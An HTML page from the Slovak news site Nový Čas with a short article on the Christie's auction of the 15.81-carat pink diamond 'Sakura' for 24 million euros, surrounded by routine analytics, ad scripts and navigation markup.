
<!DOCTYPE html>
<!--[if lt IE 7 ]>
<html lang="sk" class="no-responsive ie6"><![endif]-->
<!--[if IE 7 ]>
<html lang="sk" class="no-responsive ie7"><![endif]-->
<!--[if IE 8 ]>
<html lang="sk" class="no-responsive ie8"><![endif]-->
<!--[if IE 9 ]>
<html lang="sk" class="ie9"><![endif]-->
<!--[if (gt IE 9)|!(IE)]><!-->
<html lang="sk">
<!--<![endif]-->

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<meta name="revisit-after" content="1 days">
	<meta name="author" content="Cas.sk">
	<meta name="copyright" content="FPD Media, a.s.">
	<meta property="article:author" content="https://www.facebook.com/novycas">
	<meta property="article:publisher" content="https://www.facebook.com/novycas">
	<meta name="viewport" id="viewport"
		content="width=device-width, initial-scale=1, maximum-scale=2.0, user-scalable=yes">
	<meta property="fb:pages" content="143523195682500">
	<meta property="og:site_name" content="Nový Čas">
	<meta property="og:type" content="website">

	<link rel="image_src" href="https://cdn.cas.sk/cas/img/svg/logo_cas.svg">
	<link rel="manifest" href="https://cdn.cas.sk/cas/css/build/manifest.json">
	<link href="https://cdn.cas.sk/cas/img/favicon/favicon-196.png" rel="shortcut icon" type="image/x-icon">
	<link rel="apple-touch-icon" href="https://cdn.cas.sk/cas/img/favicon/favicon-196.png">
	<script id="facebook-jssdk" src="//connect.facebook.net/sk_SK/sdk.js"></script>
	<script async="async" defer="defer"
		src="https://cdn.cas.sk/cas/js/vendor/gemius/current.js?v=3.1406eb7e5"></script>
	<script type="text/javascript"
		src="https://cdn.cas.sk/cas/js/build/bundle.js?v=49d8b5fb99adb42718ec2778f53b21ea"></script>
	<link rel="stylesheet" type="text/css" charset="utf-8"
		href="https://cdn.cas.sk/cas/css/build/bundle.css?v=56b9e18f5db05811d8076aedaf9d85a5">
	<script>
		var viewport = document.getElementById('viewport')['content'];
		if (typeof viewport == 'string') {
			//iphone 6 plus
			if (navigator.userAgent.search(/iPhone/) != -1 && (window.screen.width == 736 || window.screen.width == 414)) {
				document.getElementById('viewport')['content'] = document.getElementById('viewport')['content'].replace("initial-scale=1", "initial-scale=0.8");
			}
		}
	</script>

		<script src="https://www.google.com/recaptcha/api.js"></script>

		<link href="https://fonts.googleapis.com/css?family=PT+Sans+Narrow:700&amp;subset=latin,latin-ext" rel="stylesheet"
			type="text/css">

		<script>
			var viewport = document.getElementById('viewport')['content'];
			if (typeof viewport == 'string') {
				//iphone 6 plus
				if (navigator.userAgent.search(/iPhone/) != -1 && (window.screen.width == 736 || window.screen.width == 414)) {
					document.getElementById('viewport')['content'] = document.getElementById('viewport')['content'].replace("initial-scale=1", "initial-scale=0.8");
				}
			}
		</script>

	<link rel="stylesheet" type="text/css" charset="utf-8" href="https://cdn.cas.sk/cas/css/cas.css">
	<script src="https://beacon.s-onetag.com/beacon.min.js"></script>
	<script type="text/javascript"
		src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=5394x"></script>
	<script type="text/javascript" src="https://cdn.predpovede.topky.sk/widget/js/z-predpovede-widget.min.js"></script>
<title>Najdrahšia sakura na svete: Z ceny tohto jedinečného unikátu odpadnete! | Nový Čas</title>
<meta property="og:title" content="Najdrahšia sakura na svete: Z ceny tohto jedinečného unikátu odpadnete!">
<meta name="description" content="Obor svojho druhu! Aukčná sieň Christie‘s prekonala rekord za najdrahšie predaný fialovoružový diamant na svete.">

<meta property="og:description" content="Obor svojho druhu! Aukčná sieň Christie‘s prekonala rekord za najdrahšie predaný fialovoružový diamant na svete.">    <meta property="og:image" content="https://img.cas.sk/cas/1280px-c1/3321895.jpg"/>
<meta property="og:url" content="https://www.cas.sk/clanok/2533997/">
<link rel="canonical" href="https://www.cas.sk/clanok/2533997/najdrahsia-sakura-na-svete-z-ceny-tohto-jedinecneho-unikatu-odpadnete/" />

<meta property="article:published_time" content="2021-05-26">
<meta property="article:modified_time" content="2021-05-25">
    <meta name="news_keywords" content="cena, zahranicie, rekord, akcia, prsten, najdrahsi, diamant, drahy, sakura, aukcna sien">
<script src="https://connect.facebook.net/sk_SK/sdk.js?hash=bed8128c48a712a7b4639d9d6e4cf248&amp;ua=modern_es6"
    async="" crossorigin="anonymous"></script>

<script src="https://cdn.cas.sk/cas/js/lib/vue.js"></script>
<script async='async' src='https://www.googletagservices.com/tag/js/gpt.js'></script>
<script type='text/javascript'>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</script><!-- Begin Next Millennium -->
<script async src="https://powerad.ai/script.js"></script>
<!-- End Next Millennium -->

<script src="https://publisher.caroda.io/videoPlayer/caroda.min.js?ctok=0e02ed5f40604175" crossorigin="anonymous" defer></script><!-- Strossle SDK -->
    <script>
        window.strossle=window.strossle||function(){(strossle.q=strossle.q||[]).push(arguments)};
        strossle('c112cf7b-dc8d-40d0-a23f-7bff94b74496', '.strossle-widget');
    </script>
<script async src="https://assets.strossle.com/strossle-widget-sdk/1/strossle-widget-sdk.js"></script>
<!-- End Strossle SDK --><script src='https://sk.search.etargetnet.com/gdpr/gdpr.js.php?ecmp=18'></script><style>img[src*="?x"] {width:100%}</style>
		<!-- Google Tag Manager -->
		<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
		new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
		j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
		'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
		})(window,document,'script','dataLayer','GTM-K8P67VC');</script>
		<!-- End Google Tag Manager -->
	</head>

	<body>			<script type="text/javascript">
				// counter
				var ts = (new Date()).getTime();
				var c = document.createElement('img');
				c.setAttribute('src', '/counter.fcgi?id=2533997&ts='+ts);
				c.setAttribute('class', 'img-counter');
				document.body.appendChild(c);
				</script>		<!-- Google Tag Manager (noscript) -->
		<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-K8P67VC"
		height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
		<!-- End Google Tag Manager (noscript) -->

		<script type="text/javascript">
			var pp_gemius_identifier = 'ofTgxLcZo4lqngX8Bxr5wfWorfFRtad4UoMVyDanuvf.q7';
			// lines below shouldn't be edited
			function gemius_pending(i) { window[i] = window[i] || function () { var x = window[i + '_pdata'] = window[i + '_pdata'] || []; x[x.length] = arguments; }; };
			gemius_pending('gemius_hit'); gemius_pending('gemius_event'); gemius_pending('pp_gemius_hit'); gemius_pending('pp_gemius_event');
			(function (d, t) {
				try {
					var gt = d.createElement(t), s = d.getElementsByTagName(t)[0], l = 'http' + ((location.protocol == 'https:') ? 's' : ''); gt.setAttribute('async', 'async');
					gt.setAttribute('defer', 'defer'); gt.src = l + '://gemius.zoznam.sk/xgemius.js'; s.parentNode.insertBefore(gt, s);
				} catch (e) { }
			})(document, 'script');
		</script>
		<script>
			(function (i, s, o, g, r, a, m) {
				i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () {
					(i[r].q = i[r].q || []).push(arguments)
				}, i[r].l = 1 * new Date(); a = s.createElement(o),
					m = s.getElementsByTagName(o)[0]; a.async = 1; a.src = g; m.parentNode.insertBefore(a, m)
			})(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');

			ga('create', 'UA-81288614-1', 'auto');
			if (window.innerWidth < 480) {
				ga('create', 'UA-36979262-1', 'auto', { 'name': 'newTracker' });
			} ga('set', 'contentGroup1', 'cas');  ga('set', 'contentGroup2', 'zahranicne-spravy');  ga('set', 'contentGroup3', 'clanok');  ga('set', 'contentGroup5', 'ktt-novy-cas'); 
			ga('send', 'pageview');
			if (window.innerWidth < 480) {
							ga('newTracker.send', 'pageview'); // Send page view for new tracker.
						}
		</script>

		<script type="text/javascript">
			var __contentVersion = $('body').responsive().getViewVersion();
			var __cas = new Cas();
			__lazyImageImmediate = __cas.setLazyImageImediate;
			__viewType = (__contentVersion <= 480) ? 'mobile' : 'desktop';
			__hideVideoAd = (__contentVersion <= 480);
			$(function () {
				Tracker.first('clanok');
				__cas.init();
				__cas.setHpMoreUrl('https://www.cas.sk/hp-load-more/');
				__cas.setSearchMoreUrl('https://www.cas.sk/search-load-more/');
				__tracker = new GlobalTracker();
			});
		</script>
		<script>
			window.fbAsyncInit = function () {
				FB.init({
					appId: '1486365238262284',
					xfbml: true,
					version: 'v2.5'
				});
			};

			(function (d, s, id) {
				var js, fjs = d.getElementsByTagName(s)[0];
				if (d.getElementById(id)) { return; }
				js = d.createElement(s); js.id = id;
				js.src = "//connect.facebook.net/sk_SK/sdk.js";
				fjs.parentNode.insertBefore(js, fjs);
			}(document, 'script', 'facebook-jssdk'));
		</script>

		<script>
			if (typeof RSWebPush != 'undefined') {
					window.RSWebPush.setConfig({
						'serviceWorkerUrl': '/worker-service-rs_base-push_service_worker.js',
						'registerSubscribeUrl': '/MagazinesApi/registerEndpoint/',
						'unregisterSubscribeUrl': '/MagazinesApi/unregisterEndpoint/',
						'log': false
					});
					window.RSWebPush.init();
				}
		</script>

		<div id="page">
			<div>					<div class="slide-menu" id="slide-menu">

						<div class="slide-menu-top">

							<div class="logo">
								<a href="/" class="rs-logo rs-logo-novy-cas-45 md-visible"
									data-event="clanok|slide-menu|"></a>
								<a href="/" class="rs-logo rs-logo-novy-cas-65 sm-visible"
									data-event="clanok|slide-menu|"></a>
								<a href="/" class="rs-logo rs-logo-novy-cas-65 xs-visible"
									data-event="clanok|slide-menu|"></a>
							</div>
							<div class="name">Streda&nbsp;26. 5.<br>
								<a data-event="clanok|slide-menu|meno-kalendar"
									href="https://calendar.zoznam.sk/meno/Dušan">Dušan</a>
							</div>

							<div class="menu-icon hidden xs-visible" id="side-menu-main-menu-toggler">
								<div class="icon-menu"></div>
							</div>

						</div>
						<div id="weather-mobile-widget"></div>

						<div class="slide-menu-content">
							<div class="slide-menu-items cloneable" data-clone-target="#main-menu"></div>
							<form onsubmit="return __cas.checkEmptySearch($(this))" class="slide-menu-search-wrapper" method="get" action="/vyhladavanie/">
							  <div class="search-input-wrapper">
								<input type="text" name="q" placeholder="Vyhľadaj" onclick="this.select();">
							  </div>
							  <div class="search-submit-bg">
								<div class="icon-search"></div>
							  </div>
							  <input data-event="hp|slide-menu|vyhladavanie" class="search-submit" type="submit" value="">
							</form>
							<div class="divider mt-md-30 mb-md-30 mt-sm-30 mb-sm-30 mb-xs-30 mt-xs-30"></div>
							<div class="slide-menu-tip">
							  <span class="slide-menu-tip-title">Vaše tipy</span>
							  <span class="slide-menu-tip-text">Máte tip na článok, zaujímavé fotografie alebo video? Pošlite nám ich!</span>
							  <a href="/tipredakcii/" class="slide-menu-tip-button">Poslať tip</a>
							</div>

							<div class="slide-menu-issue">							</div>
						</div>

					</div>

					<div class="page-container">
						<!-- Header --><header>        <div class="main-logo">    <div class="main-logo-wrapper">
        <a href="/" class="rs-logo rs-logo-novy-cas-100 lg-visible"
            data-event="clanok|hlavicka|logo-cas" title="Čas.sk - Hlavná stránka">Nový čas</a>
        <a href="/" class="rs-logo rs-logo-novy-cas-95 md-visible"
            data-event="clanok|hlavicka|logo-cas" title="Čas.sk - Hlavná stránka"></a>
        <a href="/" class="rs-logo rs-logo-novy-cas-85 sm-visible"
            data-event="clanok|hlavicka|logo-cas" title="Čas.sk - Hlavná stránka"></a>
        <a href="/" class="rs-logo rs-logo-novy-cas-65 xs-visible"
            data-event="clanok|hlavicka|logo-cas" title="Čas.sk - Hlavná stránka"></a>
    </div>        </div>
    <nav class="menu-container">

        <div class="menu-wrapper">

<menu class="" id="main-menu">			<a href="/spravy/koronavirus/"  title="Koronavírus"  data-event="hp-prominenti|hlavicka|hlavne-menu-">Koronavírus</a>			<a href="/spravy/" class="menu-item" title="Správy"  data-event="hp-prominenti|hlavicka|hlavne-menu-">Správy</a>			<a href="/prominenti/"  title="Prominenti"  data-event="hp-prominenti|hlavicka|hlavne-menu-">Prominenti</a>			<a href="/sport/" class="menu-item" title="Šport"  data-event="hp-prominenti|hlavicka|hlavne-menu-">Šport</a>			<a href="/sport/hokej/ms-hokej-2021/"  title="MS v hokeji 2021"  data-event="hp-prominenti|hlavicka|hlavne-menu-">MS v hokeji 2021</a>			<a href="/tip-od-vas/" class="menu-item" title="Tip od Vás"  data-event="hp-prominenti|hlavicka|hlavne-menu-">Tip od Vás</a>			<a  href="/prominenti/prominenti-kucherenko/" title="Kucherenko"  data-event="hp-prominenti|hlavicka|hlavne-menu-">Kucherenko			</a>			<a onclick="trackOutbound(this, 'MENU', 'Tivi - Menu');" href="https://tivi.cas.sk/" title="TIVI.SK"  data-event="hp-prominenti|hlavicka|hlavne-menu-">TIVI.SK			</a>			<a  href="/horoskopy/" title="Horoskop"  data-event="hp-prominenti|hlavicka|hlavne-menu-">Horoskop			</a>			<a  href="/aktualne-titulky/" title="Titulka"  data-event="hp-prominenti|hlavicka|hlavne-menu-">Titulka			</a>			<a  href="/spravy/europa/" title="Európa"  data-event="hp-prominenti|hlavicka|hlavne-menu-">Európa			</a></menu>

            <div class="hidden lg-visible search-box">
                <div class="search-box-wrapper">
                    <div class="search-box-toggle" id="search-box-toggle">
                        <div class="icon-search"></div>
                    </div>
                    <div class="search-box-form" id="search-box-form">
                        <form onsubmit="return __cas.checkEmptySearch($(this))" method="get"
                            action="/vyhladavanie/">
                            <div class="search-box-form-left" id="search-box-toggle-close">
                                <span class="icon-close"></span>
                            </div>
                            <div class="search-box-form-center">
                                <input class="search-box-input" type="text" name="q" placeholder="Vyhľadaj"
                                    onclick="this.select();">
                            </div>
                            <div class="search-box-form-right">
                                <input data-event="clanok|hlavicka|search" class="search-box-submit"
                                    name="sn" type="submit" value="">
                            </div>
                            <input type="hidden" name="hash" value="b5f1cddf5a3">
                        </form>
                    </div>
                </div>
            </div>

            <div class="menu-additional">

                <div class="date fleft">Streda&nbsp;26. 5.
                </div>

                <div class="divider fleft">|</div>

                <div class="nameday fleft">
                    <a title="Dnes má meniny Dušan" data-event="clanok|hlavicka|meniny"
                        href="https://calendar.zoznam.sk/meno/Dušan">Dušan</a>
                </div>


                <div class="divider fleft">|</div>
                <div id="weather-widget"></div>
<script>

var widget = window.zPredpovedeWidget({
    cookie: {
        domain: ".cas.sk"
    }
});
widget.push("#weather-widget",
    '<div class="weather fleft">' +
        '<div class="weather-icon fleft">' +
            '<div class="relative weather-img-small ib" title="%WEATHER_TITLE%">' +
                 '<img src="%WEATHER_IMAGE%">' +
            '</div>' +
        '</div>' +
        '<a class="link" href="%WEATHER_LINK%" title="%WEATHER_TITLE%"' +
            'data-event="clanok|hlavicka|pocasie-aktuality">' +
            '<span class="temperature fleft">%WEATHER_TEMPERATURE%</span>' +
        '</a>' +
        '%WEATHER_CITY_SELECT%' +
    '</div>'
);

widget.push("#weather-mobile-widget",
    '<div class="slide-menu-weather">' +
        '<a class="link" href="%WEATHER_LINK%" title="%WEATHER_TITLE%"' +
            'data-event="clanok|hlavicka|pocasie-aktuality">' +
            '<span class="temperature fleft">%WEATHER_TEMPERATURE%  %WEATHER_TITLE%</span>' +
        '</a>' +
        ' | %WEATHER_CITY_SELECT%' +
    '</div>'
);

widget.run();
</script>
                <div class="tip">
                    <a class="tip-logo" href="/tipredakcii/" title="Tip od Vás | Nový Čas">
                        <img src="https://cdn.cas.sk/cas/img/flag_tipodvas.png" alt="Tip od Vás"
                            title="Tip od Vás | Nový Čas">
                    </a>
                    <a class="tip-text" href="/tipredakcii/" title="Tip od Vás | Nový Čas">
                        <span class="cas-color-font">Máte tip?</span> <br> Pošlite nám ho!
                    </a>
                </div>

                <div class="menu_advertisement">
                    <div class="rs-advertisement rs-advertisement-cas-desktop-banner-logo">
                        <!-- Reklamna plocha cas-desktop-banner-logo -->
                        <!-- Neexistuje -->
                    </div>
                </div>

            </div>

            <div class="slide-menu-icon hidden md-visible sm-visible xs-visible" id="main-menu-toggler">
                <span class="hamburger icon icon-menu"></span>
            </div>

        </div>

    </nav>

</header>
						<!-- Header end -->

						<div style="width: 100%; height: 0px; margin: 0 auto; background: #000; margin-top: 10px;"></div>
<div class="rs-advertisement rs-advertisement-cas-desktop-screen-top">
  <!-- Reklamna plocha cas-desktop-screen-top -->
  <style>#div-gpt-ad-cas-desktop-screen-top > div:first-child { padding: 10px 0; }</style>
  <div id="div-gpt-ad-cas-desktop-screen-top" style="text-align: center; width: 100%; box-sizing: border-box;">
    <div id='top1'>
      <script>
        googletag.cmd.push(function() { googletag.display('top1'); });
      </script>
    </div>
  </div>
</div><div class="rs-advertisement rs-advertisement-cas-desktop-square">
<div id='m_top1' style="text-align: center; width: 100%; padding: 10px 0;">
  <script>
    googletag.cmd.push(function() { googletag.display('m_top1'); });
  </script>
</div>
</div>					</div>				<div class="page-container"><div id="compact-menu" class="style-white">
	<div class="logo-wrap">
		<a href="/" class="rs-logo rs-logo-novy-cas-35"  data-event="clanok|lista-biela|lista-biela-logo" ></a>
	</div>
	<div class="social header-social">		<a class="fb fb-cnt btn-a sm-hidden xs-hidden" href="#"  data-event="clanok|lista-biela|lista-biela-share" onclick="__cas.trackSocialButtons('facebook','zdielat-hlavicka' )" data-href="https://www.facebook.com/sharer.php?u=https://www.cas.sk/clanok/2533997/najdrahsia-sakura-na-svete-z-ceny-tohto-jedinecneho-unikatu-odpadnete/" data-url="https://www.cas.sk/clanok/2533997/najdrahsia-sakura-na-svete-z-ceny-tohto-jedinecneho-unikatu-odpadnete/" data-share-count="0">
			<span class="">Zdieľaj</span>
		</a>
		<a class="fb-icon md-hidden lg-hidden"
		   href="https://www.facebook.com/sharer.php?u=https://www.cas.sk/clanok/2533997/"  data-event="clanok|lista-biela|facebook" data-url="https://www.cas.sk/clanok/2533997/najdrahsia-sakura-na-svete-z-ceny-tohto-jedinecneho-unikatu-odpadnete/" data-share-count="0" target="_blank">
		</a>
			<a class="btn-a white-btn diss icon-diss "  data-event="clanok|lista-biela|lista-biela-diskusia" title="Diskusia | Nový Čas" href="/diskusia/2533997/najdrahsia-sakura-na-svete-z-ceny-tohto-jedinecneho-unikatu-odpadnete/">
				<span class="text-diss">
					<span class="button-title sm-hidden xs-hidden">Diskusia</span>
					<span class="slash sm-hidden xs-hidden"> / </span>
					<span class="cnt disqus-comment-count" data-disqus-identifier="2533997"></span>
				</span>
			</a>			<div id="button_webpush_5dced80a350d8" class="button-webpush"></div>
			<script type="text/javascript">
				if(typeof RSWebPush != 'undefined') {
					RSWebPush.addReadyListener(function () {
						(new window.BtnWebPush($('#button_webpush_5dced80a350d8')[0])).init('Vypnúť upozornenia');
					});
				}
			</script>	</div>
	<script type="text/javascript">
		$(function () {
			$(__cas.handleSocial());
		});
	</script>
</div>
<script type="text/javascript">
	$(__cas.handleCompactMenu() );
</script>
<div class="article-container">
    <article id="float5dced80a34cd7">
        <div class="article-wrapper">
<div class="date-categories">Dnes 03:00		<span class="sep">|</span>
		<a class="breadcrumb" href="/spravy/" title="Správy" data-event="clanok|cesticka|Správy">Správy</a>		<span class="sep">|</span>
		<a class="breadcrumb" href="/spravy/zahranicne-spravy/" title="Zahraničné správy" data-event="clanok|cesticka|Zahraničné správy">Zahraničné správy</a></div>    <div class="flags">    </div>
<h1 class="mt-lg-10">Najdrahšia sakura na svete: Z ceny tohto jedinečného unikátu odpadnete!</h1>
<div class="cb"></div>
<div class="mt20 social-tip">        <div class="share-facebook-twitter-button">            <a href="http://www.facebook.com/sharer.php?u=https://www.cas.sk/clanok/2533997/"
            data-url="https://www.cas.sk/clanok/2533997/najdrahsia-sakura-na-svete-z-ceny-tohto-jedinecneho-unikatu-odpadnete/"
            class="fb-button" data-event="clanok|funkcne-prvky|fb-share-pod-nadpisom">
                <span class="full-width">Zdieľaj na Facebooku</span>
                <span class="mobile-width">Zdieľaj</span>
            </a>
            <div style="clear: both"></div>
        </div>        <a data-event="clanok|funkcne-prvky|diskusia-pod-nadpisom" class="article-discussion-button"
           href="/diskusia/2533997/najdrahsia-sakura-na-svete-z-ceny-tohto-jedinecneho-unikatu-odpadnete/"
           title="Diskusia | Nový Čas">
            <span class="button-title">Diskusia / </span>
            <span class="count disqus-comment-count" data-disqus-identifier="2533997"></span>
        </a>
        <div id="button_webpush_5dced80a3547c" class="button-webpush"></div>
        <script type="text/javascript">
            if(typeof RSWebPush != 'undefined') {
                RSWebPush.addReadyListener(function () {
                    (new window.BtnWebPush($('#button_webpush_5dced80a3547c')[0])).init('');
                });
            }
        </script>    <div class="tip">
        <a data-event="clanok|funkcne-prvky|mate-tip-pod-nadpisom" class="md-visible sm-visible lg-visible"
           href="/tipredakcii/" title="Máte tip? Dajte nám vedieť.">
            <span class="cas-color-font font-pt-sans-bold">Máte tip?</span>
            <span class="underline">Dajte nám vedieť</span></a>
        <a data-event="clanok|funkcne-prvky|mate-tip-pod-nadpisom" class="xs-visible" href="/tipredakcii/">
            <span class="cas-color-font font-pt-sans-bold" title="Máte tip? Dajte nám vedieť.">Máte tip?</span>
        </a>
    </div>
    <div class="cb"></div>
</div>
<div class="mt20 ">        <div class="main-image relative">
            <div class="article-image">
                <span class="imgwrapper">                        <a data-event="clanok|funkcne-prvky|galeria-obrazok" title="Najdrahšia sakura na svete: Z ceny tohto jedinečného unikátu odpadnete!"        href="/fotogaleria/2532891/najdrahsia-sakura-na-svete-z-ceny-tohto-jedinecneho-unikatu-odpadnete/1/" class="img">                        <img id=img-2533997 class="immediate_lazy_load" src=""
                             data-1024="https://img.cas.sk/cas/1280px-c2/3321895.jpg"
                             data-1024x2="https://img.cas.sk/cas/1280px-c2/3321895.jpg"
                             title="Najdrahšia sakura na svete: Z ceny tohto jedinečného unikátu odpadnete! | Nový Čas" alt="Najdrahšia sakura na svete: Z ceny tohto jedinečného unikátu odpadnete!"
                             itemprop="image"><noscript><img
                            src="https://img.cas.sk/cas/1280px-c2/3321895.jpg"></noscript><script>if( typeof __lazyImageImmediate == "function" ){__lazyImageImmediate("#img-2533997")}</script>                        <span class="info-layer">
                            <span class="cnt">2</span>
                            <span class="cnt-text">Galéria &gt;</span>
                        </span>
                        <span class="article-photo-hover">Otvoriť galériu</span>
                        </a>                    <div class="info-wrapper">
                        <a data-event="clanok|funkcne-prvky|galeria-nadpis"        href="/fotogaleria/2532891/najdrahsia-sakura-na-svete-z-ceny-tohto-jedinecneho-unikatu-odpadnete/1/" class="titlewrapper" title="Diamant za 24 miliónov €.">Diamant za 24 miliónov €.                        </a>                            <div class="img-source">Zdroj: christie‘s</div>                        <div class="tiny-clear"></div>
                    </div>
                </span>
            </div>
        </div></div>
<div class="article-content ">
    <div class="introtext mt20" itemprop="description">Obor svojho druhu! Aukčná sieň Christie‘s prekonala rekord za najdrahšie predaný fialovoružový diamant na svete.    </div>

    <div itemprop="articleBody" class="fulltext mt20" id="ga-article-event"><p>Cena za klenot s príznačným menom Sakura sa v nedeľu vyšplhala na 24 miliónov eur.</p>

<p>Je to unikát! Vzácny kameň bol pomenovaný ako Sakura, čo je japonský čerešňový kvet. <strong>&#8222;15,81-karátový diamant bol ďalšou dôležitou súčasťou aukcie šperkov v&nbsp;histórii,&#8220; </strong>uviedla vedúca oddelenia šperkov aukčnej siene Christie&#8216;s Vickie Sek. Kameň bol klasifikovaný ako vnútorne bezchybný. Tiež je klasifikovaný ako fantasticky žiarivý, čo je miera intenzívnej farby, ktorú dosahujú iba 4&#8201;% ružových diamantov.</p>

<p>Jeho jedinečnosť spočíva aj vo veľkosti, keďže menej než 10&#8201;% ružových kameňov váži viac ako pätinu karátu. <strong>Kupcom takéhoto klenotu bola súkromná osoba z&nbsp;Ázie, ktorá zaň zaplatila 24 miliónov eur.</strong> Prekonal tak minuloročný rekord za 14,8-karátový fialovoružový diamant pomenovaný ako Duch ruže. Aukčná sieň Sotheby&#8216;s ho vydražila v&nbsp;Ženeve za 22 miliónov eur.
<div class="article-object article-object-linked">
    <div class="img">
        <a data-event="clanok|linkovany-clanok|clanok-obrazok" href="https://www.cas.sk/clanok/2532417/ruska-policia-nasla-v-lese-ukradnute-diamanty-a-drahokamy-z-ich-hodnoty-sa-vam-zatoci-hlava/"
           title="Ruská polícia našla v lese ukradnuté diamanty a drahokamy: Z ich hodnoty sa vám zatočí hlava">
            <img class="lazy_load"
                 src="https://img.cas.sk/cas/320px-c1/3318491.jpg"
                 data-1024="https://img.cas.sk/cas/320px-c1/3318491.jpg"
                 data-1024x2="https://img.cas.sk/cas/320px-c1/3318491.jpg"
                 title="Inscription "Police" on the board of russian police vehicle. Police patrol car in Russia | Nový Čas"
                 alt="Inscription "Police" on the board of russian police vehicle. Police patrol car in Russia"
                 style="display: none;">
            <noscript>
                <img src="https://img.cas.sk/cas/320px-c1/3318491.jpg">
            </noscript>
        </a>
    </div>
    <div class="text pt-lg-25 pb-lg-25 pr-lg-25 pt-md-25 pb-md-25 pr-md-25 pt-sm-25 pb-sm-25 pr-sm-25">
        <h2 class="font-pt-serif-bold">
            <a data-event="clanok|linkovany-clanok|clanok-nadpis" href="https://www.cas.sk/clanok/2532417/ruska-policia-nasla-v-lese-ukradnute-diamanty-a-drahokamy-z-ich-hodnoty-sa-vam-zatoci-hlava/">Ruská polícia našla v lese ukradnuté diamanty a drahokamy: Z ich hodnoty sa vám zatočí hlava            </a>
        </h2>
    </div>
</div></p><div id="videoad">
					<script>
					googletag.cmd.push(function() { googletag.display("videoad"); });
					</script>
				</div>
				<div class="rs-advertisement rs-advertisement-cas-desktop-square-inline">
					<div id="m_mid2">
					<script>
						googletag.cmd.push(function() { googletag.display("m_mid2"); });
					</script>
					</div>
				</div>
    </div>
    <script>
        var _ArticleGaEvent = new ArticleGaEvent();
        _ArticleGaEvent.articleId = 2533997;
        _ArticleGaEvent.init('ga-article-event');
    </script>
    <div class="mt20">            <div class="share-facebook-twitter-button ">                <a href="http://www.facebook.com/sharer.php?u=https://www.cas.sk/clanok/2533997/"
                data-url="https://www.cas.sk/clanok/2533997/najdrahsia-sakura-na-svete-z-ceny-tohto-jedinecneho-unikatu-odpadnete/"
                class="fb-button" data-event="clanok|funkcne-prvky|fb-share-pod-clankom">
                    <span class="full-width">Zdieľaj na Facebooku</span>
                    <span class="mobile-width">Zdieľaj</span>
                </a>
                <div style="clear: both"></div>
            </div>            <a data-event="clanok|funkcne-prvky|diskusia-pod-clankom" class="article-discussion-button"
               href="/diskusia/2533997/najdrahsia-sakura-na-svete-z-ceny-tohto-jedinecneho-unikatu-odpadnete/"
               title="Diskusia | Nový Čas">
                <span class="button-title">Diskusia / </span>
                <span class="count disqus-comment-count" data-disqus-identifier="2533997"></span>
                <script id="dsq-count-scr" src="//cas-sk.disqus.com/count.js" async=""></script>
            </a>
            <div id="button_webpush_5dced80a35a0a" class="button-webpush"></div>
            <script type="text/javascript">
                if(typeof RSWebPush != 'undefined') {
                    RSWebPush.addReadyListener(function () {
                        (new window.BtnWebPush($('#button_webpush_5dced80a35a0a')[0])).init('');
                    });
                }

            </script>        <div class="cb"></div>
    </div>
</div>
        </div>        <div class="under-article mr-lg-20 mr-md-10"><div class="rs-advertisement rs-advertisement-cas-desktop-square">
  <div id='m_other1'>
    <script>
      googletag.cmd.push(function() { googletag.display('m_other1'); });
    </script>
  </div>
</div>    <div class="article-related-list mt-lg-20 mt-md-20 mt-sm-20 mt-xs-10 pt-lg-20 pt-md-20 pt-sm-20 pt-xs-10">    
		<span class="title cas-color-font pb-md-10 pb-sm-10 pb-xs-10 mt-xs-10">Súvisiace články:</span>
		<ul>        	<li>
        		<a  data-event="clanok|citajte-dalej-verzia-A|clanok-1"  href="/clanok/2527757/bratislava-hlasi-rekordny-pocet-zaockovanych-za-jediny-den-cislo-ktore-vycari-usmev-na-tvari/" title="Bratislava hlási rekordný počet zaočkovaných za jediný deň: Číslo, ktoré vyčarí úsmev na tvári">Bratislava hlási rekordný počet zaočkovaných za jediný deň: Číslo, ktoré vyčarí úsmev na tvári				</a>
    		</li>        	<li>
        		<a  data-event="clanok|citajte-dalej-verzia-A|clanok-2"  href="/clanok/2530823/pokorili-rekord-do-ceuty-dorazilo-za-jediny-den-najmenej-5000-migrantov/" title="Pokorili rekord: Do Ceuty dorazilo za jediný deň najmenej 5000 migrantov">Pokorili rekord: Do Ceuty dorazilo za jediný deň najmenej 5000 migrantov				</a>
    		</li>        	<li>
        		<a  data-event="clanok|citajte-dalej-verzia-A|clanok-3"  href="/clanok/2531191/unikatna-stihacka-v-cesku-muzeum-ziskalo-lietadlo-na-ktorom-bojovali-nasi-piloti/" title="Unikátna stíhačka v Česku: Múzeum získalo lietadlo, na ktorom bojovali naši piloti">Unikátna stíhačka v Česku: Múzeum získalo lietadlo, na ktorom bojovali naši piloti				</a>
    		</li>        	<li>
        		<a  data-event="clanok|citajte-dalej-verzia-A|clanok-4"  href="/clanok/2531459/styria-slovenski-ucitelia-su-nominovani-na-ocenenie-global-teacher-prize-nadsene-slova-ziacok/" title="Štyria slovenskí učitelia sú nominovaní na ocenenie Global Teacher Prize: Nadšené slová žiačok">Štyria slovenskí učitelia sú nominovaní na ocenenie Global Teacher Prize: Nadšené slová žiačok				</a>
    		</li>        	<li>
        		<a  data-event="clanok|citajte-dalej-verzia-A|clanok-5"  href="/clanok/2532123/zdeseni-fanusikovia-priatelov-sa-obavaju-o-matthewa-perryho-chandler-si-v-poriadku/" title="Zdesení fanúšikovia Priateľov sa obávajú o Matthewa Perryho: Chandler, si v poriadku?!">Zdesení fanúšikovia Priateľov sa obávajú o Matthewa Perryho: Chandler, si v poriadku?!				</a>
    		</li>        	<li>
